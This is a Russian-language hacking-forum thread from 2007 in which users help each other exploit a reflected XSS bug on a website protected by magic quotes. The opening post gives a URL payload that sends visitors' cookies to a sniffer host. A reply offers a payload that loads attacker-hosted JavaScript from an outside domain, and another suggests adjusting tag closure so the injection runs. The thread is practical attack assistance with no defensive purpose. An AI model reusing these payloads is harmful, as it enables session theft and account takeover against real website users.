HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как,
  #1  
Старый 22.11.2007, 21:04
x-demon
Постоянный
Регистрация: 10.06.2007
Сообщений: 476
С нами: 9957986

Репутация: 299
По умолчанию Как,

Короче есть уязвимость. Но на сервере включены magic quotes.
Как обойти? xss пасивная
somesite/?order=%22%3E%3Cscript%3Edocument.location.href=%2 7javascript:http://snfiffaddr.tld/s.gif?%27+document.cookie;%3C/script%3E
 
Ответить с цитированием

  #2  
Старый 22.11.2007, 21:25
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

somesite/?order=<script src=http://hek.ru/1.js></script>

в 1.js пишешь нужный те код
__________________
 
Ответить с цитированием

  #3  
Старый 07.12.2007, 22:22
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
С нами: 10362626

Репутация: 327
По умолчанию

если вдруг не выполнится посмотри в исходник страницы, найди строку, глянь может надо добавить /> после order=
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
FAQ. Перед тем как задать вопрос. Fata1ex Skype, IRC, ICQ, Jabber и другие IM 1 04.11.2007 20:35
Как напакастить форумчанам или как сказать :) Ponchik Уязвимости CMS / форумов 8 02.10.2006 19:37



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.